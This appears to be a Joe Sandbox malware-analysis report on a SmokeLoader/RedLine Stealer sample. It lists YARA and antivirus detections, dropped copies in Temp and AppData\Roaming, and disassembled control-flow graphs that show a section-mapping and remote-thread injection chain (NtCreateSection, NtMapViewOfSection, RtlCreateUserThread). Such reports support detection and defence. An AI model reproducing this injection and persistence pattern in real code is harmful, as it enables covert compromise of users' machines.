                                                                                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.1983346956.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1983398685.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1983398685.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1983485699.0000000000A7C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                        • Detection: 63%, ReversingLabs
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Target ID:7
                                                                                                                        Start time:05:13:44
                                                                                                                        Start date:30/11/2024
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\7E95.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\7E95.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:196'096 bytes
                                                                                                                        MD5 hash:C56489FED27114B3EAD6D98FAD967C15
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000003.2776796462.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2828263113.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2828263113.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2828387793.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2828387793.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2828242020.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2828537263.0000000000A3C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                        • Detection: 55%, ReversingLabs
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Target ID:8
                                                                                                                        Start time:05:14:11
                                                                                                                        Start date:30/11/2024
                                                                                                                        Path:C:\Users\user\AppData\Roaming\wrhivcv
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\wrhivcv
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:196'096 bytes
                                                                                                                        MD5 hash:C56489FED27114B3EAD6D98FAD967C15
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                        • Detection: 55%, ReversingLabs
                                                                                                                        Reputation:low
                                                                                                                        Has exited:false

                                                                                                                        Reset < >

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:6.4%
                                                                                                                          Dynamic/Decrypted Code Coverage:17.5%
                                                                                                                          Signature Coverage:52%
                                                                                                                          Total number of Nodes:177
                                                                                                                          Total number of Limit Nodes:8
                                                                                                                          execution_graph 5534 401545 5535 401556 5534->5535 5536 4016ff NtDuplicateObject 5535->5536 5545 4015f5 5535->5545 5537 40171c NtCreateSection 5536->5537 5536->5545 5538 401742 NtMapViewOfSection 5537->5538 5539 40179c NtCreateSection 5537->5539 5538->5539 5541 401765 NtMapViewOfSection 5538->5541 5540 4017c8 5539->5540 5539->5545 5542 4017d2 NtMapViewOfSection 5540->5542 5540->5545 5541->5539 5543 401783 5541->5543 5544 4017f9 NtMapViewOfSection 5542->5544 5542->5545 5543->5539 5544->5545 5546 40181b 5544->5546 5546->5545 5547 401820 HeapCreate 5546->5547 5547->5545 5497 9f0188 5498 9f0193 5497->5498 5501 9f0204 5497->5501 5502 9f0199 5498->5502 5503 9f01a8 5502->5503 5506 9f0939 5503->5506 5511 9f0954 5506->5511 5507 9f095d CreateToolhelp32Snapshot 5508 9f0979 Module32First 5507->5508 5507->5511 5509 9f0198 5508->5509 5510 9f0988 5508->5510 5513 9f05f8 5510->5513 5511->5507 5511->5508 5514 9f0623 5513->5514 5515 9f0634 VirtualAlloc 5514->5515 5516 9f066c 5514->5516 5515->5516 5516->5516 5631 40165e 5632 401667 5631->5632 5633 4016ff NtDuplicateObject 5632->5633 5642 4019cd 5632->5642 5634 40171c NtCreateSection 5633->5634 5633->5642 5635 401742 NtMapViewOfSection 5634->5635 5636 40179c NtCreateSection 5634->5636 5635->5636 5638 401765 NtMapViewOfSection 5635->5638 5637 4017c8 5636->5637 5636->5642 5639 4017d2 NtMapViewOfSection 5637->5639 5637->5642 5638->5636 5640 401783 5638->5640 5641 4017f9 NtMapViewOfSection 5639->5641 5639->5642 5640->5636 5641->5642 5643 40181b 5641->5643 5643->5642 5644 401820 HeapCreate 5643->5644 5644->5642 5478 9a003c 5479 9a0049 5478->5479 5491 9a0e0f SetErrorMode SetErrorMode 5479->5491 5484 9a0265 5485 9a02ce VirtualProtect 5484->5485 5487 9a030b 5485->5487 5486 9a0439 VirtualFree 5489 9a04be LoadLibraryA 5486->5489 5487->5486 5490 9a08c7 5489->5490 5492 9a0223 5491->5492 5493 9a0d90 5492->5493 5494 9a0dad 5493->5494 5495 9a0dbb GetPEB 5494->5495 5496 9a0238 VirtualAlloc 5494->5496 5495->5496 5496->5484 5692 401a2f 5693 401a49 5692->5693 5694 401a6e Sleep 5693->5694 5695 401546 8 API calls 5694->5695 5696 401a89 5695->5696 5697 401652 8 API calls 5696->5697 5698 401a9a 5696->5698 5697->5698 5388 41c4f0 5391 41c110 5388->5391 5390 41c4f5 5392 41c120 5391->5392 5393 41c291 5392->5393 5394 41c1e1 9 API calls 5392->5394 5395 41c29a 6 API calls 5393->5395 5396 41c38d GlobalAlloc 5393->5396 5406 41c275 5394->5406 5398 41c2f0 6 API calls 5395->5398 5402 41c3a9 5396->5402 5400 41c376 OpenFileMappingA 5398->5400 5401 41c37f 5398->5401 5399 41c3e3 5411 41bd30 GetModuleHandleW GetProcAddress VirtualProtect 5399->5411 5400->5401 5401->5396 5410 41be70 LoadLibraryW 5402->5410 5404 41c3e8 5412 41c080 5404->5412 5406->5393 5407 41c3ed 5408 41c42e InterlockedDecrement GetSystemTime 5407->5408 5409 41c44a 5407->5409 5408->5407 5409->5390 5410->5399 5411->5404 5421 41bf60 5412->5421 5415 41c0b9 GetEnvironmentStringsW 5416 41c0bf 5415->5416 5424 41bfd0 5416->5424 5419 41c0f7 5419->5407 5420 41c0d6 GetConsoleAliasesA GetVolumePathNameW 5420->5419 5422 41bfa1 5421->5422 5423 41bf8c GetCommandLineA GetModuleFileNameW 5421->5423 5422->5415 5422->5416 5423->5422 5425 41c04e 5424->5425 5427 41bff3 5424->5427 5425->5419 5425->5420 5427->5425 5428 41c03a GetShortPathNameW 5427->5428 5429 41bfc0 5427->5429 5428->5427 5432 41bf10 5429->5432 5433 41bf40 5432->5433 5434 41bf2d GetAce 5432->5434 5433->5427 5434->5433 5580 9a092b GetPEB 5581 9a0972 5580->5581 5435 402ff5 5436 402fed 5435->5436 5438 403086 5436->5438 5439 401a23 5436->5439 5440 401a31 5439->5440 5441 401a6e Sleep 5440->5441 5446 401546 5441->5446 5443 401a89 5445 401a9a 5443->5445 5460 401652 5443->5460 5445->5438 5447 401556 5446->5447 5448 4016ff NtDuplicateObject 5447->5448 5457 4015f5 5447->5457 5449 40171c NtCreateSection 5448->5449 5448->5457 5450 401742 NtMapViewOfSection 5449->5450 5451 40179c NtCreateSection 5449->5451 5450->5451 5453 401765 NtMapViewOfSection 5450->5453 5452 4017c8 5451->5452 5451->5457 5454 4017d2 NtMapViewOfSection 5452->5454 5452->5457 5453->5451 5455 401783 5453->5455 5456 4017f9 NtMapViewOfSection 5454->5456 5454->5457 5455->5451 5456->5457 5458 40181b 5456->5458 5457->5443 5458->5457 5474 401820 5458->5474 5461 40165b 5460->5461 5462 4019cd 5461->5462 5463 4016ff NtDuplicateObject 5461->5463 5462->5445 5463->5462 5464 40171c NtCreateSection 5463->5464 5465 401742 NtMapViewOfSection 5464->5465 5466 40179c NtCreateSection 5464->5466 5465->5466 5468 401765 NtMapViewOfSection 5465->5468 5466->5462 5467 4017c8 5466->5467 5467->5462 5469 4017d2 NtMapViewOfSection 5467->5469 5468->5466 5470 401783 5468->5470 5469->5462 5471 4017f9 NtMapViewOfSection 5469->5471 5470->5466 5471->5462 5472 40181b 5471->5472 5472->5462 5473 401820 HeapCreate 5472->5473 5473->5462 5475 401822 HeapCreate 5474->5475 5477 40186e 5475->5477 5477->5457 5576 403135 5577 403278 5576->5577 5578 40315f 5576->5578 5578->5577 5579 40323b RtlCreateUserThread NtTerminateProcess 5578->5579 5579->5577 5718 401ab7 5719 401a73 5718->5719 5722 401a9a 5718->5722 5720 401a89 5719->5720 5721 401546 8 API calls 5719->5721 5720->5722 5723 401652 8 API calls 5720->5723 5721->5720 5723->5722 5728 41c3b6 5729 41c3c0 5728->5729 5738 41be70 LoadLibraryW 5729->5738 5731 41c3e3 5739 41bd30 GetModuleHandleW GetProcAddress VirtualProtect 5731->5739 5733 41c3e8 5734 41c080 7 API calls 5733->5734 5735 41c3ed 5734->5735 5736 41c42e InterlockedDecrement GetSystemTime 5735->5736 5737 41c44a 5735->5737 5736->5735 5738->5731 5739->5733 5517 4032f8 5519 40329b 5517->5519 5518 40323b RtlCreateUserThread NtTerminateProcess 5521 403278 5518->5521 5519->5518 5520 403301 5519->5520 5740 402fb8 5742 402fc0 5740->5742 5741 401a23 16 API calls 5743 403086 5741->5743 5742->5741 5742->5743 5530 40183b 5531 401842 HeapCreate 5530->5531 5533 40186e 5531->5533 5659 40327e 5662 403291 5659->5662 5660 40323b RtlCreateUserThread NtTerminateProcess 5663 403278 5660->5663 5661 403301 5662->5660 5662->5661

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 85 401546-40154f 86 401565 85->86 87 401556-4015ab call 4012cb 85->87 86->87 98 4015ad-4015c9 87->98 99 40161f-401624 87->99 104 401640 98->104 105 4015cb 98->105 100 401646-40164c 99->100 101 401626 99->101 103 40164d-40164f 100->103 106 40161b-40161d 105->106 107 4015cd-4015cf 105->107 106->99 108 4015d1-4015ea 107->108 109 401629-40163a 107->109 108->103 110 4015ec-4015f1 108->110 118 40165c 109->118 119 40163c 109->119 112 4015f3 110->112 113 40166e 110->113 114 4015f5-4015fe 112->114 115 401667-401668 112->115 116 40165b-40166c 113->116 117 40166f-4016a9 call 4012cb 113->117 115->117 122 401662 116->122 130 4016ab 117->130 131 4016ae-4016b3 117->131 118->122 122->115 130->131 133 4016b9-4016ca 131->133 134 4019cf-4019d7 131->134 137 4016d0-4016f9 133->137 138 4019cd 133->138 134->131 139 4019dc-401a20 call 4012cb 134->139 137->138 146 4016ff-401716 NtDuplicateObject 137->146 138->139 146->138 148 40171c-401740 NtCreateSection 146->148 150 401742-401763 NtMapViewOfSection 148->150 151 40179c-4017c2 NtCreateSection 148->151 150->151 155 401765-401781 NtMapViewOfSection 150->155 151->138 154 4017c8-4017cc 151->154 154->138 156 4017d2-4017f3 NtMapViewOfSection 154->156 155->151 157 401783-401799 155->157 156->138 160 4017f9-401815 NtMapViewOfSection 156->160 157->151 160->138 163 40181b 160->163 163->138 164 40181b call 401820 163->164 164->138
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6cd5c1709ac7b711dbdb46d56fa3852b59184e0f4001c1450d715fc554d72dd0
                                                                                                                          • Instruction ID: 8966994f51f5220269a050c3a05b0be66836dc0e2615c8264cabc048db8ca459
                                                                                                                          • Opcode Fuzzy Hash: 6cd5c1709ac7b711dbdb46d56fa3852b59184e0f4001c1450d715fc554d72dd0
                                                                                                                          • Instruction Fuzzy Hash: 13A126B1A04204FBDB219F91CC45FAF7BB8EF81750F24446BF542BA1E1D2799901CB5A

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 165 401652-4016a9 call 4012cb 179 4016ab 165->179 180 4016ae-4016b3 165->180 179->180 182 4016b9-4016ca 180->182 183 4019cf-4019d7 180->183 186 4016d0-4016f9 182->186 187 4019cd 182->187 183->180 188 4019dc-401a20 call 4012cb 183->188 186->187 195 4016ff-401716 NtDuplicateObject 186->195 187->188 195->187 197 40171c-401740 NtCreateSection 195->197 199 401742-401763 NtMapViewOfSection 197->199 200 40179c-4017c2 NtCreateSection 197->200 199->200 204 401765-401781 NtMapViewOfSection 199->204 200->187 203 4017c8-4017cc 200->203 203->187 205 4017d2-4017f3 NtMapViewOfSection 203->205 204->200 206 401783-401799 204->206 205->187 209 4017f9-401815 NtMapViewOfSection 205->209 206->200 209->187 212 40181b 209->212 212->187 213 40181b call 401820 212->213 213->187
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175E
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040177C
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,0000000C), ref: 004017BD
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004017EE
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401810
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: 769cff3db2a16ff9947aca2e1bc7df02427bdea62afa969ed6e84abdacd5d8fb
                                                                                                                          • Instruction ID: 08707dfce16203c79c186cea6ac9f890c639e5fa9aae9c39073b6eac8e5c48a5
                                                                                                                          • Opcode Fuzzy Hash: 769cff3db2a16ff9947aca2e1bc7df02427bdea62afa969ed6e84abdacd5d8fb
                                                                                                                          • Instruction Fuzzy Hash: B0514DB4900244BFEB209F91CC49FEFBBB8EF85B00F14012AF951BA1E5D6759945CB64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 214 40165e-4016a9 call 4012cb 225 4016ab 214->225 226 4016ae-4016b3 214->226 225->226 228 4016b9-4016ca 226->228 229 4019cf-4019d7 226->229 232 4016d0-4016f9 228->232 233 4019cd 228->233 229->226 234 4019dc-401a20 call 4012cb 229->234 232->233 241 4016ff-401716 NtDuplicateObject 232->241 233->234 241->233 243 40171c-401740 NtCreateSection 241->243 245 401742-401763 NtMapViewOfSection 243->245 246 40179c-4017c2 NtCreateSection 243->246 245->246 250 401765-401781 NtMapViewOfSection 245->250 246->233 249 4017c8-4017cc 246->249 249->233 251 4017d2-4017f3 NtMapViewOfSection 249->251 250->246 252 401783-401799 250->252 251->233 255 4017f9-401815 NtMapViewOfSection 251->255 252->246 255->233 258 40181b 255->258 258->233 259 40181b call 401820 258->259 259->233
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175E
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040177C
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,0000000C), ref: 004017BD
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004017EE
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401810
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: 8d2ab844faf546b4f5f52a9945f897ad4b2d557e0515ebb43b3a700dc4ab6994
                                                                                                                          • Instruction ID: d82c1138886ff24aec3403b45069446d704daea90aca27dc33efe5e37eb28e93
                                                                                                                          • Opcode Fuzzy Hash: 8d2ab844faf546b4f5f52a9945f897ad4b2d557e0515ebb43b3a700dc4ab6994
                                                                                                                          • Instruction Fuzzy Hash: B8514BB1900244BFEB208F91CC48FAFBBB8EF85B00F14016AF951BA2E5D6759905CB64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 260 40166a-4016a9 call 4012cb 273 4016ab 260->273 274 4016ae-4016b3 260->274 273->274 276 4016b9-4016ca 274->276 277 4019cf-4019d7 274->277 280 4016d0-4016f9 276->280 281 4019cd 276->281 277->274 282 4019dc-401a20 call 4012cb 277->282 280->281 289 4016ff-401716 NtDuplicateObject 280->289 281->282 289->281 291 40171c-401740 NtCreateSection 289->291 293 401742-401763 NtMapViewOfSection 291->293 294 40179c-4017c2 NtCreateSection 291->294 293->294 298 401765-401781 NtMapViewOfSection 293->298 294->281 297 4017c8-4017cc 294->297 297->281 299 4017d2-4017f3 NtMapViewOfSection 297->299 298->294 300 401783-401799 298->300 299->281 303 4017f9-401815 NtMapViewOfSection 299->303 300->294 303->281 306 40181b 303->306 306->281 307 40181b call 401820 306->307 307->281
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175E
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040177C
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,0000000C), ref: 004017BD
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004017EE
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401810
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: 1ea370aaa42164f932e49b278ceee8f942154ee2d8d32f83138b8784e9761f6c
                                                                                                                          • Instruction ID: 6d453cfa5274170bfbdae373e5c1c9b429e4ee8d346c6281ffbd38a208f90e25
                                                                                                                          • Opcode Fuzzy Hash: 1ea370aaa42164f932e49b278ceee8f942154ee2d8d32f83138b8784e9761f6c
                                                                                                                          • Instruction Fuzzy Hash: FF513AB4900245BBEB208F91CC48FAFBBB8EF85B00F14016AF951BA2E4D6759945CB64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 308 401691-4016a9 call 4012cb 312 4016ab 308->312 313 4016ae-4016b3 308->313 312->313 315 4016b9-4016ca 313->315 316 4019cf-4019d7 313->316 319 4016d0-4016f9 315->319 320 4019cd 315->320 316->313 321 4019dc-401a20 call 4012cb 316->321 319->320 328 4016ff-401716 NtDuplicateObject 319->328 320->321 328->320 330 40171c-401740 NtCreateSection 328->330 332 401742-401763 NtMapViewOfSection 330->332 333 40179c-4017c2 NtCreateSection 330->333 332->333 337 401765-401781 NtMapViewOfSection 332->337 333->320 336 4017c8-4017cc 333->336 336->320 338 4017d2-4017f3 NtMapViewOfSection 336->338 337->333 339 401783-401799 337->339 338->320 342 4017f9-401815 NtMapViewOfSection 338->342 339->333 342->320 345 40181b 342->345 345->320 346 40181b call 401820 345->346 346->320
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002,?,0000000C), ref: 0040170E
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,0000000C), ref: 0040173B
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175E
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040177C
                                                                                                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,0000000C), ref: 004017BD
                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004017EE
                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401810
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Section$View$Create$DuplicateObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1546783058-0
                                                                                                                          • Opcode ID: 95d62bb5d2fb3017c69896b09fd0c8dd1b8bc5303f582cbfad1cf34534ba11e6
                                                                                                                          • Instruction ID: a4aae6b86718a9dceeda142fe4c9f3d337048079e59506af87c2624b4c8528a1
                                                                                                                          • Opcode Fuzzy Hash: 95d62bb5d2fb3017c69896b09fd0c8dd1b8bc5303f582cbfad1cf34534ba11e6
                                                                                                                          • Instruction Fuzzy Hash: 535108B5900249BBEF209F91CC48FEFBBB8EF85B10F104169F951AA2A5D7709944CB64

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 348 403135-403159 349 403278-40327d 348->349 350 40315f-403177 348->350 350->349 351 40317d-40318e 350->351 352 403190-403199 351->352 353 40319e-4031ac 352->353 353->353 354 4031ae-4031b5 353->354 355 4031d7-4031de 354->355 356 4031b7-4031d6 354->356 357 403200-403203 355->357 358 4031e0-4031ff 355->358 356->355 359 403205-403208 357->359 360 40320c 357->360 358->357 359->360 361 40320a 359->361 360->352 362 40320e-403213 360->362 361->362 362->349 363 403215-403218 362->363 363->349 364 40321a-403275 RtlCreateUserThread NtTerminateProcess 363->364 364->349
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcessTerminateThreadUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1921587553-0
                                                                                                                          • Opcode ID: 88e323ebcc8cfc6628e15868eb3694d16e1535974f295d677a4f92b6fbc021e4
                                                                                                                          • Instruction ID: ea6061ee1c3098f13e0f7a0edf0e04afb299d666a4a386905c82e4678c4decca
                                                                                                                          • Opcode Fuzzy Hash: 88e323ebcc8cfc6628e15868eb3694d16e1535974f295d677a4f92b6fbc021e4
                                                                                                                          • Instruction Fuzzy Hash: 5B412632618E084FD768EF6CA84966277D6E798311B2643AED808D7385EE30D85183C5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 366 40327e-40328f 367 403291-403293 366->367 368 4032fd-4032ff 366->368 370 40329b-4032b4 367->370 369 403301-403321 368->369 368->370 371 403323 369->371 372 40332a-403335 369->372 373 4032b6 370->373 374 4032bb-4032c5 370->374 371->372 380 403325-403326 371->380 376 403337 372->376 377 40333c-403351 372->377 373->374 375 4032b8 373->375 378 4032c7 374->378 379 4032ce-4032f4 call 401349 374->379 381 4032ba 375->381 382 40323b-40327d RtlCreateUserThread NtTerminateProcess 375->382 376->377 383 403339-40333a 376->383 390 403354 377->390 378->379 385 4032c8-4032cd 378->385 379->368 380->372 381->374 383->377 385->379 390->390
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1740990116.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3WaqgS34S7.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e6b5d4aa042eeb9fc5c67cc315633b6bcdb668e3db296512d28d2684d4bbfc7d
                                                                                                                          • Instruction ID: f85e0e2fc3bef3d1689db4ef00eb6110e2ec86435fc76eaec67dd06365047321
                                                                                                                          • Opcode Fuzzy Hash: e6b5d4aa042eeb9fc5c67cc315633b6bcdb668e3db296512d28d2684d4bbfc7d
                                                                                                                          • Instruction Fuzzy Hash: 4C315D7180C2848FD714DFA898C63677FA4EF15316F2804FFD88567392D6399605978B

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 394 9f0939-9f0952 395 9f0954-9f0956 394->395 396 9f095d-9f0969 CreateToolhelp32Snapshot 395->396 397 9f0958 395->397 398 9f096b-9f0971 396->398 399 9f0979-9f0986 Module32First 396->399 397->396 398->399 404 9f0973-9f0977 398->404 400 9f098f-9f0997 399->400 401 9f0988-9f0989 call 9f05f8 399->401 405 9f098e 401->405 404->395 404->399 405->400
                                                                                                                          APIs
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009F0961
                                                                                                                          • Module32First.KERNEL32(00000000,00000224), ref: 009F0981
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1741605367.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_9ed000_3WaqgS34S7.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3833638111-0
                                                                                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                          • Instruction ID: 46f2980058039e63923854cfc67815beb1b8ff1d37c3166a3cba43514c2f2618
